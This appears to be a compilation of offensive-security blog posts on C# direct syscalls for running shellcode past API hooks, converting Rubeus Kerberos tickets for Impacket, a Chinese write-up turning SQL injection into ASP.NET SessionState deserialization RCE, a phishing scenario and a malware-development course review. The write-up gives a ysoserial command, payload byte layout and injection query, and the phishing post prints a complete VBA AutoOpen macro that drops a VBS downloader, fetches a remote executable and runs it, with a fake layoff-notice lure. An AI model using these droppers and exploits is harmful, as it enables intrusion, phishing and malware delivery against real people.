Wait a minute, these docs all have C/C++ implementations. How do we translate them into C#? The answer is marshaling. This is the essence of what P/Invoke does. Marshaling is a way of making use of unmanaged code, e.g. C/C++, and using in a managed context, that is, in C#. This is easily done for Win32 APIs via P/Invoke. Just import the DLL, specify the function definition with the help of pinvoke.net, and you’re off to the races. You can see this in the demo code of Win32Injector. But since syscalls are undocumented, Microsoft does not provide such an easy way to interface with them. But it is indeed possible, through the magic of delegates. Jack Halon covers delegates really well here and here, so I won’t go too in depth in this post. I would suggest reading those posts to get a good handle on them, and the process of using syscalls in general. But for completeness, delegates are essentially function pointers, which allow us to pass functions as parameters to other functions. The way we use them here is to define a delegate whose return type and function signature matches that of the syscall we want to use. We use marshaling to make sure the C/C++ data types are compatible with C#, define a function that implements the syscall, including all of its parameters and return type, and there you have it!

Not quite. We can’t actually call a native API, since the only implementation of it we have is in assembly! We know its function definition and parameters, but we can’t actually call it directly the same way we do a Win32 API. The assembly will work just fine for us though. Once again, it’s rather simple to execute assembly in C/C++, but C# is a little harder. Luckily we have a way to do it, and we already have the assembly from our WinDbg adventures. And don’t worry, you don’t really need to know assembly to make use of syscalls. Here is the assembly for the NtAllocateVirtualMemory syscall:

NtAllocateVirtualMemory Assembly

As you can see from the comments, we’re setting up some arguments on the stack, moving our syscall number into the eax register, and using the magic syscall operator. At a low enough level, this is just a function call. And remember how delegates are just function pointers? Hopefully it’s starting to make sense how this is fitting together. We need to get a function pointer that points to this assembly, along with some arguments in a C/C++ compatible format, in order to call a native API.

Putting it all together

So we’re almost done now. We have our syscalls, their numbers, the assembly to call them, and a way to call them in delegates. Let’s see how it actually looks in C#:

NtAllocateVirtualMemory Code

Starting from the top, we can see the C/C++ definition of NtAllocateVirtualMemory, as well as the assembly for the syscall itself. Starting at line 38, we have the C# definition of NtAllocateVirtualMemory. Note that it can take some trial and error to get each type in C# to match up with the unmanaged type. We create a pointer to our assembly inside an unsafe block. This allows us to perform operations in C#, like operate on raw memory, that are normally not safe in managed code. We also use the fixed keyword to make sure the C# garbage collector does not inadvertently move our memory around and change our pointers. Once we have a raw pointer to the memory location of our shellcode, we need to change its memory protection to executable so it can be run directly, as it will be a function pointer and not just data. Note that I am using the Win32 API VirtualProtectEx to change the memory protection. I’m not aware of a way to do this via syscall, as it’s kind of a chicken and the egg problem of getting the memory executable in order to run a syscall. If anyone knows how to do this in C#, please reach out! Another thing to note here is that setting memory to RWX is generally somewhat suspicious, but as this is a POC, I’m not too worried about that at this point. We’re concerned with hooking right now, not memory scanning!

Now comes the magic. This is the struct where our delegates are declared:

Delegates Struct

Note that a delegate definition is just a function signature and return type. The implementation is up to us, as long as it matches the delegate definition, and it’s what we’re implementing here in the C# NtAllocateVirtualMemory function. At line 65 above, we create a delegate named assembledFunction, which takes advantage of the special marshaling function Marshal.GetDelegateForFunctionPointer. This method allows us to get a delegate from a function pointer. In this case, our function pointer is the pointer to the syscall assembly called memoryAddress. assembledFunction is now a function pointer to an assembly language function, which means we’re now able to execute our syscall! We can call assembledFunction delegate like any normal function, complete with arguments, and we will get the results of the NtAllocateVirtualMemory syscall. So in our return statement we call assembledFunction with the arguments that were passed in and return the result. Let’s look at where we actually call this function in Program.cs:

Calling NtAllocateMemory

Here you can see we make a call to NtAllocateMemory instead of the Win32 API VirtualAlloc that Win32Injector uses. We setup the function call with all the needed arguments (lines 43-48) and make the call to NtAllocateMemory. This returns a block of memory for our shellcode, just like VirtualAlloc would!

The remaining steps are similar:

Remaining Syscalls

We copy our shellcode into our newly-allocated memory, and then create a thread within our current process pointing to that memory via another syscall, NtCreateThreadEx, in place of CreateThread. Finally, we start the thread with a call to the syscall NtWaitForSingleObject, instead of WaitForSingleObject. Here’s the final result:

Hello World Shellcode

Hello world via syscall! Assuming this was some sort of payload running on a system with API hooking enabled, we would have bypassed it and successfully run our payload.

A note on native code

Some key parts of this puzzle I’ve not mentioned yet are all of the native structs, enumerations, and definitions needed for the syscalls to function properly. If you look at the screenshots above, you will see types that don’t have implementations in C#, like the NTSTATUS return type for all the syscalls, or the AllocationType and ACCESS_MASK bitmasks. These types are normally declared in various Windows headers and DLLs, but to use syscalls we need to implement them ourselves. The process I followed to find them was to look for any non-simple type and try to find a definition for it. Pinvoke.net was massively helpful for this task. Between it and other resources like MSDN and the ReactOS source code, I was able to find and add everything I needed. You can find that code in the Native.cs class of the solution here.

Wrapup

Syscalls are fun! It’s not every day you get to combine 3 different languages, managed and unmanaged code, and several levels of Windows APIs in one small program. That said, there are some clear difficulties with syscalls. They require a fair bit of boilerplate code to use, and that boilerplate is scattered all around for you to find like a little undocumented treasure hunt. Debugging can also be tricky with the transition between managed and unmanaged code. Finally, syscall numbers change frequently and have to be customized for the platform you’re targeting. D/Invoke seems to handle several of these issues rather elegantly, so I’m excited to dig into those more soon.

Rubeus to Ccache

17 May 2020 at 15:20

Rubeus to Ccache

I wrote a new little tool called RubeusToCcache recently to handle a use case I come across often: converting the Rubeus output of Base64-encoded Kerberos tickets into .ccache files for use with Impacket.

Background

If you’ve done any network penetration testing, red teaming, or Hack The Box/CTFs, you’ve probably come across Rubeus. It’s a fantastic tool for all things Kerebos, especially when it comes to tickets and Pass The Ticket/Overpass The Hash attacks. One of the most commonly used features of Rubeus is the ability to request/dump TGTs and use them in different contexts in Rubeus or with other tools. Normally Rubeus outputs the tickets in Base64-encoded .kirbi format, .kirbi being the type of file commonly used by Mimikatz. The Base64 encoding make it very easy to copy and paste and generally make use of the TGT in different ways.

You can also use acquired tickets with another excellent toolset, Impacket. Many of the Impacket tools can use Kerberos authentication via a TGT, which is incredibly useful in a lot of different contexts, such as pivoting through a compromised host so you can Stay Off the Land. Only one problem: Impacket tools use the .ccache file format to represent Kerberos tickets. Not to worry though, because Zer1t0 wrote ticket_converter.py (included with Impacket), which allows you to convert .kirbi files directly into .ccache files. Problem solved, right?

Rubeus To Ccache

Mostly solved, because there’s still the fact that Rubeus spits out .kirbi files Base64 encoded. Is it hard or time-consuming to do a simple little [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64RubeusTGT)) to get a .kirbi and then use ticket_converter.py? Not at all, but it’s still an extra step that gets repeated over and over, making it ripe for a little automation. Hence Rubeus to Ccache.

You pass it the Base64-encoded blob Rubeus gives you, along with a file name for a .kirbi file and a .ccache file, and you get a fresh ticket in both formats, ready for Impacket. To use the .ccache file, make sure to set the appropriate environment variable: export KRB5CCNAME=shiny_new_ticket.ccache. Then you can use most Impacket tools like this: wmiexec.py domain/[email protected] -k -no-pass, where the -k flag indicates the use of Kerberos tickets for authentication.

Usage

╦═╗┬ ┬┌┐ ┌─┐┬ ┬┌─┐  ┌┬┐┌─┐  ╔═╗┌─┐┌─┐┌─┐┬ ┬┌─┐
╠╦╝│ │├┴┐├┤ │ │└─┐   │ │ │  ║  │  ├─┤│  ├─┤├┤
╩╚═└─┘└─┘└─┘└─┘└─┘   ┴ └─┘  ╚═╝└─┘┴ ┴└─┘┴ ┴└─┘
              By Solomon Sklash
          github.com/SolomonSklash
   Inspired by Zer1t0's ticket_converter.py

usage: rubeustoccache.py [-h] base64_input kirbi ccache

positional arguments:
  base64_input  The Base64-encoded .kirbi, sucha as from Rubeus.
  kirbi         The name of the output file for the decoded .kirbi file.
  ccache        The name of the output file for the ccache file.

optional arguments:
  -h, --help    show this help message and exit

Thanks

Thanks to Zer1t0 and the Impacket project for doing most of the havy lifting.

從 SQL 到 RCE: 利用 SessionState 反序列化攻擊 ASP.NET 網站應用程式

20 April 2020 at 16:00

今日來聊聊在去年某次滲透測試過中發現的趣事,那是在一個風和日麗的下午,與往常一樣進行著枯燥的測試環節,對每個參數嘗試各種可能的注入,但遲遲沒有任何進展和突破,直到在某個頁面上注入 ?id=1; waitfor delay '00:00:05'--,然後他就卡住了,過了恰好 5 秒鐘後伺服器又有回應,這表示我們找到一個 SQL Server 上的 SQL Injection!

一些陳舊、龐大的系統中,因為一些複雜的因素,往往仍使用著 sa 帳戶來登入 SQL Server,而在有如此高權限的資料庫帳戶前提下,我們可以輕易利用 xp_cmdshell 來執行系統指令以取得資料庫伺服器的作業系統控制權,但假如故事有如此順利,就不會出現這篇文章,所以理所當然我們取得的資料庫帳戶並沒有足夠權限。但因為發現的 SQL Injection 是 Stacked based,我們仍然可以對資料表做 CRUD,運氣好控制到一些網站設定變數的話,甚至可以直接達成 RCE,所以還是試著 dump schema 以了解架構,而在 dump 過程中發現了一個有趣的資料庫:

Database: ASPState
[2 tables]
+---------------------------------------+
| dbo.ASPStateTempApplications          |
| dbo.ASPStateTempSessions              |
+---------------------------------------+

閱讀文件後了解到,這個資料庫的存在用途是用來保存 ASP.NET 網站應用程式的 session。一般情況下預設 session 是儲存在 ASP.NET 網站應用程式的記憶體中,但某些分散式架構(例如 Load Balance 架構)的情況下,同時會有多個一模一樣的 ASP.NET 網站應用程式運行在不同伺服器主機上,而使用者每次請求時被分配到的伺服器主機也不會完全一致,就會需要有可以讓多個主機共享 session 的機制,而儲存在 SQL Server 上就是一種解決方案之一,想啟用這個機制可以在 web.config 中添加如下設定:

<configuration>
    <system.web>
        <!-- 將 session 保存在 SQL Server 中。 -->
        <sessionState
            mode="SQLServer"
            sqlConnectionString="data source=127.0.0.1;user id=<username>;password=<password>"
            timeout="20"
        />
        
        <!-- 預設值,將 session 保存在記憶體中。 -->
        <!-- <sessionState mode="InProc" timeout="20" /> -->
 
        <!-- 將 session 保存在 ASP.NET State Service 中,
             另一種跨主機共享 session 的解決方案。 -->
        <!--
        <sessionState
            mode="StateServer"
            stateConnectionString="tcpip=localhost:42424"
            timeout="20"
        />
        -->
    </system.web>
</configuration>

而要在資料庫中建立 ASPState 的資料庫,可以利用內建的工具 C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regsql.exe 完成這個任務,只需要使用下述指令即可:

# 建立 ASPState 資料庫
aspnet_regsql.exe -S 127.0.0.1 -U sa -P password -ssadd -sstype p

# 移除 ASPState 資料庫
aspnet_regsql.exe -S 127.0.0.1 -U sa -P password -ssremove -sstype p

現在我們了解如何設定 session 的儲存位置,且又可以控制 ASPState 資料庫,可以做到些什麼呢?這就是文章標題的重點,取得 Remote Code Execution!

ASP.NET 允許我們在 session 中儲存一些物件,例如儲存一個 List 物件:Session["secret"] = new List<String>() { "secret string" };,對於如何將這些物件保存到 SQL Server 上,理所當然地使用了序列化機制來處理,而我們又控制了資料庫,所以也能執行任意反序列化,為此需要先了解 Session 物件序列化與反序列化的過程。

簡單閱讀程式碼後,很快就可以定位出處理相關過程的類別,為了縮減說明的篇幅,以下將直接切入重點說明從資料庫取出資料後進行了什麼樣的反序列化操作。核心主要是透過呼叫 SqlSessionStateStore.GetItem 函式還原出 Session 物件,雖然已盡可能把無關緊要的程式碼移除,但行數還是偏多,如果懶得閱讀程式碼的朋友可以直接下拉繼續看文章說明 XD

namespace System.Web.SessionState {
    internal class SqlSessionStateStore : SessionStateStoreProviderBase {
        public override SessionStateStoreData  GetItem(HttpContext context,
                                                        String id,
                                                        out bool locked,
                                                        out TimeSpan lockAge,
                                                        out object lockId,
                                                        out SessionStateActions actionFlags) {
            SessionIDManager.CheckIdLength(id, true /* throwOnFail */);
            return DoGet(context, id, false, out locked, out lockAge, out lockId, out actionFlags);
        }

        SessionStateStoreData DoGet(HttpContext context, String id, bool getExclusive,
                                        out bool locked,
                                        out TimeSpan lockAge,
                                        out object lockId,
                                        out SessionStateActions actionFlags) {
            SqlDataReader       reader;
            byte []             buf;
            MemoryStream        stream = null;
            SessionStateStoreData    item;
            SqlStateConnection  conn = null;
            SqlCommand          cmd = null;
            bool                usePooling = true;

            buf = null;
            reader = null;
            conn = GetConnection(id, ref usePooling);

            try {
                if (getExclusive) {
                    cmd = conn.TempGetExclusive;
                } else {
                    cmd = conn.TempGet;
                }

                cmd.Parameters[0].Value = id + _partitionInfo.AppSuffix; // @id
                cmd.Parameters[1].Value = Convert.DBNull;   // @itemShort
                cmd.Parameters[2].Value = Convert.DBNull;   // @locked
                cmd.Parameters[3].Value = Convert.DBNull;   // @lockDate or @lockAge
                cmd.Parameters[4].Value = Convert.DBNull;   // @lockCookie
                cmd.Parameters[5].Value = Convert.DBNull;   // @actionFlags

                using(reader = SqlExecuteReaderWithRetry(cmd, CommandBehavior.Default)) {
                    if (reader != null) {
                        try {
                            if (reader.Read()) {
                                buf = (byte[]) reader[0];
                            }
                        } catch(Exception e) {
                            ThrowSqlConnectionException(cmd.Connection, e);
                        }
                    }
                }

                if (buf == null) {
                    /* Get short item */
                    buf = (byte[]) cmd.Parameters[1].Value;
                }

                using(stream = new MemoryStream(buf)) {
                    item = SessionStateUtility.DeserializeStoreData(context, stream, s_configCompressionEnabled);
                    _rqOrigStreamLen = (int) stream.Position;
                }
                return item;
            } finally {
                DisposeOrReuseConnection(ref conn, usePooling);
            }
        }
        
        class SqlStateConnection : IDisposable {
            internal SqlCommand TempGet {
                get {
                    if (_cmdTempGet == null) {
                        _cmdTempGet = new SqlCommand("dbo.TempGetStateItem3", _sqlConnection);
                        _cmdTempGet.CommandType = CommandType.StoredProcedure;
                        _cmdTempGet.CommandTimeout = s_commandTimeout;
                        // ignore process of setting parameters
                    }
                    return _cmdTempGet;
                }
            }
        }
    }
}

我們可以從程式碼清楚看出主要是呼叫 ASPState.dbo.TempGetStateItem3 Stored Procedure 取得 Session 的序列化二進制資料並保存到 buf 變數,最後將 buf 傳入 SessionStateUtility.DeserializeStoreData 進行反序列化還原出 Session 物件,而 TempGetStateItem3 這個 SP 則是相當於在執行 SELECT SessionItemShort FROM [ASPState].dbo.ASPStateTempSessions,所以可以知道 Session 是儲存在 ASPStateTempSessions 資料表的 SessionItemShort 欄位中。接著讓我們繼續往下看關鍵的 DeserializeStoreData 做了什麼樣的操作。同樣地,行數偏多,有需求的朋友請自行下拉 XD

namespace System.Web.SessionState {
    public static class SessionStateUtility {

        [SecurityPermission(SecurityAction.Assert, SerializationFormatter = true)]
        internal static SessionStateStoreData Deserialize(HttpContext context, Stream stream) {
            int                 timeout;
            SessionStateItemCollection   sessionItems;
            bool                hasItems;
            bool                hasStaticObjects;
            HttpStaticObjectsCollection staticObjects;
            Byte                eof;

            try {
                BinaryReader reader = new BinaryReader(stream);
                timeout = reader.ReadInt32();
                hasItems = reader.ReadBoolean();
                hasStaticObjects = reader.ReadBoolean();

                if (hasItems) {
                    sessionItems = SessionStateItemCollection.Deserialize(reader);
                } else {
                    sessionItems = new SessionStateItemCollection();
                }

                if (hasStaticObjects) {
                    staticObjects = HttpStaticObjectsCollection.Deserialize(reader);
                } else {
                    staticObjects = SessionStateUtility.GetSessionStaticObjects(context);
                }

                eof = reader.ReadByte();
                if (eof != 0xff) {
                    throw new HttpException(SR.GetString(SR.Invalid_session_state));
                }
            } catch (EndOfStreamException) {
                throw new HttpException(SR.GetString(SR.Invalid_session_state));
            }
            return new SessionStateStoreData(sessionItems, staticObjects, timeout);
        }
    
        static internal SessionStateStoreData DeserializeStoreData(HttpContext context, Stream stream, bool compressionEnabled) {
            return SessionStateUtility.Deserialize(context, stream);
        }
    }
}

我們可以看到實際上 DeserializeStoreData 又是把反序列化過程轉交給其他類別,而依據取出的資料不同,可能會轉交給 SessionStateItemCollection.DeserializeHttpStaticObjectsCollection.Deserialize 做處理,在觀察程式碼後發現 HttpStaticObjectsCollection 的處理相對單純,所以我個人就選擇往這個分支下去研究。

namespace System.Web {
    public sealed class HttpStaticObjectsCollection : ICollection {
        static public HttpStaticObjectsCollection Deserialize(BinaryReader reader) {
            int     count;
            string  name;
            string  typename;
            bool    hasInstance;
            Object  instance;
            HttpStaticObjectsEntry  entry;
            HttpStaticObjectsCollection col;

            col = new HttpStaticObjectsCollection();

            count = reader.ReadInt32();
            while (count-- > 0) {
                name = reader.ReadString();
                hasInstance = reader.ReadBoolean();
                if (hasInstance) {
                    instance = AltSerialization.ReadValueFromStream(reader);
                    entry = new HttpStaticObjectsEntry(name, instance, 0);
                }
                else {
                    // skipped
                }
                col._objects.Add(name, entry);
            }

            return col;
        }
    }
}

跟進去一看,發現 HttpStaticObjectsCollection 取出一些 bytes 之後,又把過程轉交給 AltSerialization.ReadValueFromStream 進行處理,看到這的朋友們或許會臉上三條線地心想:「該不會又要追進去吧 . . 」,不過其實到此為止就已足夠,因為 AltSerialization 實際上類似於 BinaryFormatter 的包裝,到此已經有足夠資訊作利用,另外還有一個原因兼好消息,當初我程式碼追到此處時,上網一查這個物件,發現 ysoserial.net 已經有建立 AltSerialization 反序列化 payload 的 plugin,所以可以直接掏出這個利器來使用!下面一行指令就可以產生執行系統指令 calc.exe 的 base64 編碼後的 payload。

ysoserial.exe -p Altserialization -M HttpStaticObjectsCollection -o base64 -c "calc.exe"

不過到此還是有個小問題需要解決,ysoserial.net 的 AltSerialization plugin 所建立的 payload 是攻擊 SessionStateItemCollection 或 HttpStaticObjectsCollection 兩個類別的反序列化操作,而我們儲存在資料庫中的 session 序列化資料是由在此之上還額外作了一層包裝的 SessionStateUtility 類別處理的,所以必須要再做點修飾。回頭再去看看程式碼,會發現 SessionStateUtility 也只添加了幾個 bytes,減化後如下所示:

timeout = reader.ReadInt32();
hasItems = reader.ReadBoolean();
hasStaticObjects = reader.ReadBoolean();

if (hasStaticObjects)
    staticObjects = HttpStaticObjectsCollection.Deserialize(reader);

eof = reader.ReadByte();

對於 Int32 要添加 4 個 bytes,Boolean 則是 1 個 byte,而因為要讓程式路徑能進入 HttpStaticObjectsCollection 的分支,必須讓第 6 個 byte 為 1 才能讓條件達成,先將原本從 ysoserial.net 產出的 payload 從 base64 轉成 hex 表示,再前後各別添加 6、1 bytes,如下示意圖:

  timeout    false  true            HttpStaticObjectsCollection             eof
┌─────────┐  ┌┐     ┌┐    ┌───────────────────────────────────────────────┐ ┌┐
00 00 00 00  00     01    010000000001140001000000fff ... 略 ... 0000000a0b ff

修飾完的這個 payload 就能用來攻擊 SessionStateUtility 類別了!

最後的步驟就是利用開頭的 SQL Injection 將惡意的序列化內容注入進去資料庫,如果正常瀏覽目標網站時有出現 ASP.NET_SessionId 的 Cookie 就代表已經有一筆對應的 Session 記錄儲存在資料庫裡,所以我們只需要執行如下的 SQL Update 語句:

?id=1; UPDATE ASPState.dbo.ASPStateTempSessions
       SET SessionItemShort = 0x{Hex_Encoded_Payload}
       WHERE SessionId LIKE '{ASP.NET_SessionId}%25'; --

分別將 {ASP.NET_SessionId} 替換成自己的 ASP.NET_SessionId 的 Cookie 值以及 {Hex_Encoded_Payload} 替換成前面準備好的序列化 payload 即可。

那假如沒有 ASP.NET_SessionId 怎麼辦?這表示目標可能還未儲存任何資料在 Session 之中,所以也就不會產生任何記錄在資料庫裡,但既然沒有的話,那我們就硬塞一個 Cookie 給它!ASP.NET 的 SessionId 是透過亂數產生的 24 個字元,但使用了客製化的字元集,可以直接使用以下的 Python script 產生一組 SessionId,例如:plxtfpabykouhu3grwv1j1qw,之後帶上 Cookie: ASP.NET_SessionId=plxtfpabykouhu3grwv1j1qw 瀏覽任一個 aspx 頁面,理論上 ASP.NET 就會自動在資料庫裡添加一筆記錄。

import random
chars = 'abcdefghijklmnopqrstuvwxyz012345'
print(''.join(random.choice(chars) for i in range(24)))

假如在資料庫裡仍然沒有任何記錄出現,那就只能手動刻 INSERT 的 SQL 來創造一個記錄,至於如何刻出這部分?只要看看程式碼應該就可以很容易構造出來,所以留給大家自行去玩 :P

等到 Payload 順利注入後,只要再次用這個 Cookie ASP.NET_SessionId=plxtfpabykouhu3grwv1j1qw 瀏覽任何一個 aspx 頁面,就會觸發反序列化執行任意系統指令!

題外話,利用 SessionState 的反序列化取得 ASP.NET 網站應用程式主機控制權的場景並不僅限於 SQL Injection。在內網滲透測試的過程中,經常會遇到的情境是,我們透過各方的資訊洩漏 ( 例如:內部 GitLab、任意讀檔等 ) 取得許多 SQL Server 的帳號、密碼,但唯獨取得不了目標 ASP.NET 網站應用程式的 Windows 主機的帳號密碼,而為了達成目標 ( 控制指定的網站主機 ),我們就曾經使用過這個方式取得目標的控制權,所以作為內網橫向移動的手段也是稍微有價值且非常有趣。至於還能有什麼樣的花樣與玩法,就要靠各位持續地發揮想像力!

Free Cyber Materials BC Of Covid

11 April 2020 at 11:20

Hello Community,

Really terrible times we’re living in right now. It doesn’t help to literally be right in the “thick of it”. My family and I are unaffected at the moment. Praying for humanity at this point.

Anyways – there’s been a bunch of free goodies going on and I wouldn’t be proper if I didn’t attempt to put some of them in a central place to provide to others 👊🏼💯 Hats off to these organizations since none of this was required at all.

Leave a comment if you’ve found something I haven’t mentioned for others who visit after you. Stay Safe 📿🙏🏼

 

Note: I get no credit for any of this! I’m simply compiling the materials in one place for you

The post Free Cyber Materials BC Of Covid appeared first on Certification Chronicles.

Pharm Raised Phish 😅🤠

31 March 2020 at 15:55

Life after CISSP:

I had so much housekeeping that I couldn’t attend to while studying (physically and digitally). My office was a complete mess. I lost access to my switch since there was a power outage and sadly I didn’t copy running-config to startup-config. Off my switch is basically everything besides wireless. My ESXI lab, my NAS, all my Raspberry Pis, and everything else. It’s tough to go from risk management to configuring ACLS and VLANs 🤣 Took me about a week to update (and save) switch configuration, cleanup my NAS, cleanup all my machines & VMs, destroy my ESXI lab and rebuild it. Just like before my ESXI lab simulates a corporate network, active directory environment with an assortment of machines running various services. I use PFSense as a virtual firewall/router. This allows you to simulate someone attacking over the WAN and having your LAN protected by a security device just like normal. You can google security courses, CTFs, to get an idea of typical lab environments. This is helpful because after you spend days importing/uploading/provisioning 5 VMs – now what? You still don’t have any services or applications running. This groundwork is fruitful we all have to spend the time to stand things up before we can even begin to start thinking about playing around.


Keeping Busy:

I begin to think about what I want to learn more about. I find an Advanced Penetration book focusing on adversary emulation and APTs that I fell in love with. It’s ironic as well because the only reason this book stood out was it was only 230 pages. I thought damn either this things is complete garbage and captures .01% of something irrelevant that some other guy loved or it’s chock full of gems. It was the latter! My heads spinning as we write our own VBA dropper, that writes a VBS file to the disk, that download the payload and execute reverse shell. At the end of chapter one we’re on writing your own C2C infrastructure implementing libssh. Just something about seeing that hardcore C with the Windows API calls that brings fear and so much curiosity! Progressively improving our payloads and infrastructure as it progresses. Here’s the book

I bet you can see where this is going. To reinforce concepts I replicated the payloads and attack from the book in my lab environment.
Here’s the scenario:

  1. Somehow through password reuse you’ve gained access (attacker) to an organizations webmail login
  2. As a budding hacker you understand situational awareness. Your target is an IT Administrator – whom is probably already a little concerned over his job security. Since through
    reconnaissance you’ve learned that 30% of the entire IT staff has already been furloughed since the pandemic began.
  3. You craft a fake Word document that seems to be a notice of this months layoffs and “mistakenly” send it to the administrator. You dress it up really nice with all the Confidential headers and footers. Of course there is no document it’s a blurred image and enabling macros is going to begin and carry out the compromise. Is looks like this



    Payload:
    Sub AutoOpen()

    Dim PayloadFile As Integer

    Dim FilePath As String

    FilePath = "C:\tmp\payload.vbs"

    PayloadFile = FreeFile


    ' Create VBS dropper, write it to disk and execute it. VBS reaches out to remote server downloads payload and executes it.

    Open FilePath For Output As PayloadFile


    Print #PayloadFile, "HTTPDownload ""https://REMOTE-SERVER/PAYLOAD.EXE"", ""C:\tmp\"""

    Print #PayloadFile, ""

    Print #PayloadFile, "Sub HTTPDownload(myURL, myPath)"

    Print #PayloadFile, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg, currentChar,res,decoded_char"

    Print #PayloadFile, " Const ForReading = 1, ForWriting = 2, ForAppending = 8"

    Print #PayloadFile, " Set objFSO = CreateObject(""Scripting.FileSystemObject"")"

    Print #PayloadFile, " If objFSO.FolderExists(myPath) Then"

    Print #PayloadFile, " strFile = objFSO.BuildPath(myPath,Mid(myURL,InStrRev( myURL,""/"")+ 1))"

    Print #PayloadFile, " ElseIf objFSO.FolderExists(Left(myPath,InStrRev( myPath, ""\"" )- 1)) Then"

    Print #PayloadFile, " strFile = myPath"

    Print #PayloadFile, " End If"

    Print #PayloadFile, ""

    Print #PayloadFile, " Set objFile = objFSO.OpenTextFile(strFile, ForWriting, True)"

    Print #PayloadFile, " Set objHTTP = CreateObject(""WinHttp.WinHttpRequest.5.1"")"

    Print #PayloadFile, " objHTTP.Open ""GET"", myURL, False"

    Print #PayloadFile, " objHTTP.Send"

    Print #PayloadFile, ""

    Print #PayloadFile, " res = objHTTP.ResponseBody"

    Print #PayloadFile, " For i = 1 To LenB(objHTTP.ResponseBody)"

    Print #PayloadFile, " currentChar = Chr(AscB(MidB(objHTTP.ResponseBody, i, 1)))"

    Print #PayloadFile, " objFile.Write currentChar"

    Print #PayloadFile, " Next"

    Print #PayloadFile, " objFile.Close( )"

    Print #PayloadFile, " Set WshShell = WScript.CreateObject(""WScript.Shell"")"

    Print #PayloadFile, " WshShell.Run ""C:\tmp\PAYLOAD.EXE""

    Print #PayloadFile, " End Sub"

    Close PayloadFile

    Shell "wscript c:\tmp\payload.vbs"

    End Sub


  4. The administrator viciously open the email, macro detonates, payload execute and you get your reverse shell.

Now that we got a way to execute payloads now on to converting the payload into a C2 host and setting the infrastructure! Here’s a videos of the process.

How’d I Get Phished from S7acktrac3 on Vimeo.

The post Pharm Raised Phish 😅🤠 appeared first on Certification Chronicles.

A Review of the Sektor7 RED TEAM Operator: Malware Development Essentials Course

24 March 2020 at 15:20

A Review of the Sektor7 RED TEAM Operator: Malware Development Essentials Course

Introduction

I recently discovered the Sektor7 RED TEAM Operator: Malware Development Essentials course on 0x00sec and it instantly grabbed my interest. Lately I’ve been working on improving my programming skills, especially in C, on Windows, and in the context of red teaming. This course checked all those boxes, and was on sale for $95 to boot. So I broke out the credit card and purchased the course.

Custom code can be a huge benefit during pentesting and red team operations, and I’ve been trying to level up in that area. I’m a pentester by trade, with a little red teaming thrown in, so this course was right in my wheelhouse. My C is slightly rusty, not having done much with it since college, and almost exclusively on Linux rather than Windows. I wasn’t sure how prepared I would be for the course, but I was willing to try harder and do as much research as I needed to get through it.

Course Overview

The course description reads like this:

It will teach you how to develop your own custom malware for latest Microsoft Windows 10. And by custom malware we mean building a dropper for any payload you want (Metasploit meterpreter, Empire or Cobalt Strike beacons, etc.), injecting your shellcodes into remote processes, creating trojan horses (backdooring existing software) and bypassing Windows Defender AV.

It’s aimed at pentesters, red teamers, and blue teamers wanting to learn the details of offensive malware. It covers a range of topics aimed at developing and delivering a payload via a dropper file, using a variety of mechanisms to encrypt, encode, or obfuscate different elements of the executable. From the course page the topics include:

  • What is malware development
  • What is PE file structure
  • Where to store your payload inside PE
  • How to encode and encrypt payloads
  • How and why obfuscate function calls
  • How to backdoor programs
  • How to inject your code into remote processes

RTO: Malware Development Essentials covers the above with 9 different modules, starting with the basics of the PE file structure, ending with combining all the techniques taught to create a dropper executable that evades Windows Defender while injecting a shellcode payload into another process.

The course is delivered via a content platform called Podia, which allows streaming of the course videos and access to code samples and the included pre-configured Windows virtual machine for compiling and testing code. Podia worked quite well, and the provided code was clear, comprehensive, well-commented, and designed to be reusable later to create your own executables.

Module 1: Intro and Setup

The intro and setup module covers a quick into to the course and getting access to the excellent sample code and a virtual machine OVA image that contains a development environment, debugger, and tools like PEBear. I really like that the VM was provided, as it made jumping in and following along effortless, as well as saving time creating a development environment.

Module 2: Portable Executable

This module covers the Portable Executable (PE) format, how it is structured, and where things like code and data reside within it. It introduces PEBear, a tool for exploring PE files I’d not used before. It also covers the differences between executables and DLLs on Windows.

Module 3: Droppers

The dropper module covers how and where to store payload shellcode within a PE, using the .text, .data, and .rsrc sections. It also covers including external resources and compiling them into the final .exe.

Module 4: Obfuscation and Hiding

Obfuscation and hiding was one of my favorite modules. Anyone that has had their shellcode or implants caught will appreciate knowing how to use AES and XOR to encrypt payloads, and how to dynamically decrypt them at runtime to prevent static analysis. I also learned a lot about Windows and the Windows API through the sections on dynamically resolving functions and function call obfuscation.

Module 5: Backdoors and Trojans

This section covered code caves, hiding data within a PE, and how to backdoor an existing executable with a payload. x64dbg debugger is used extensively to examine a binary, find space for a payload, and ensure that the existing binary still functions normally. Already knowing assembly helped me here, but it’s explained well enough for those with little to no assembly knowledge to follow along.

Module 6: Code Injection

I learned a ton from this section, and it really clarified my knowledge of process injection, including within a process, between processes, and using a DLL. VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread are more than just some function names involving process injection to me now.

Module 7: Extras

This module covered the differences between GUI and console programs on Windows, and how to ensure the dreaded black console window does not appear when your payload is executed.

Module 8: Combined Project

This was the culmination of the course, where you are walked through combining all the individual techniques and tools you learned throughout the course into a single executable. I suggest watching it and then doing it yourself independently to really internalize the material.

Module 9: Assignment

The last module is an assignment, which asks you to take what you’ve learned in the combined project and more fully implement some of the techniques, as well as providing some suggestions for real-world applications of the course content you can try by yourself.

Takeaways

I learned a heck of a lot from this course. It was not particularly long, but it covered the topics thoroughly and gave me a good base to build from. I can’t remember a course where I learned so much in so little time. Not only did I learn what was intended by the course, but there were a lot of ancillary things I picked up along the way that weren’t explicitly covered.

C on Windows

I found the course to be a good introduction to C on Windows, assuming you are already familiar with C. It’s not a beginning C programming course by any means. Most of my experience with C has been on Linux with gcc, and the course provided practical examples of how to write C on Windows, how to use MSDN effectively, how to structure programs, and how to interact with DLLs. I was familiar with many of the topics at a high level, but there’s no substitute for digging in and writing code.

Intro to the Windows API

I also learned a great deal on how the Windows API works and how to interact with it. The section on resolving functions manually was especially good. I have a much stronger grasp of how Windows presents different functionalities, and how to lookup functions and APIs on MSDN to incorporate them into my own code.

Making Windows Concepts Concrete

As mentioned above, there were a lot of areas I knew about at a high level, like process injection, DLLs, the Import Address Table, even some Windows APIs like WriteProcessMemory and CreateRemoteThread. But once I looked up their function signatures on MSDN, called them myself, created my own DLLs, and obfuscated the IAT, I had a much more concrete understanding of each topic, and I feel much more prepared to write my own tools in the future using what I’ve learned.

A Framework For Building Your Own Payloads

